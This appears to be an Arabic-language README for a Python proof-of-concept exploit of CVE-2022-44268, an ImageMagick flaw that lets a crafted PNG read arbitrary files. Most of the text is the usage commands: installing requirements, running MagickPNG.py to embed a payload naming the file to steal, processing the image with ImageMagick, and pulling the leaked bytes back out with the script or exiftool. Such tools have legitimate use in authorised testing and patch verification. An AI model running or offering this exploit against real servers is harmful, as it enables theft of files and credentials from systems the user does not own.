
استغلال Python (PoC) لثغرة CVE-2022-44268 يدمج محتويات ملفات عشوائية داخل صور PNG عبر ImageMagick، مع دعم استخراجها باستخدام exiftool.
بعض أدوات PoC لا تعمل مع محتويات ملفات محددة. قد تعمل أداة PoC هذه مع محتويات لا تعمل مع أدوات PoC الأخرى.
قم باستنساخ هذا المستودع عبر Git. ثم ثبّت المتطلبات.
pip install -r requirements.txt
لتضمين الحمولة (payload) داخل صورة:
python3 MagickPNG.py -i <image to modify> -f <file to read> -o <output file>
ثم استخدم ImageMagick لتحديث ملف PNG الخاص بك.
لاستخراج البيانات من الملف المعدّل بواسطة ImageMagick:
python3 MagickPNG.py -d <resulting image> -o <output file>
إذا لم يعمل هذا، جرّب استخدام exiftool لاستخراج البايتات على هيئة hex.
exiftool -all:all -s image.png -b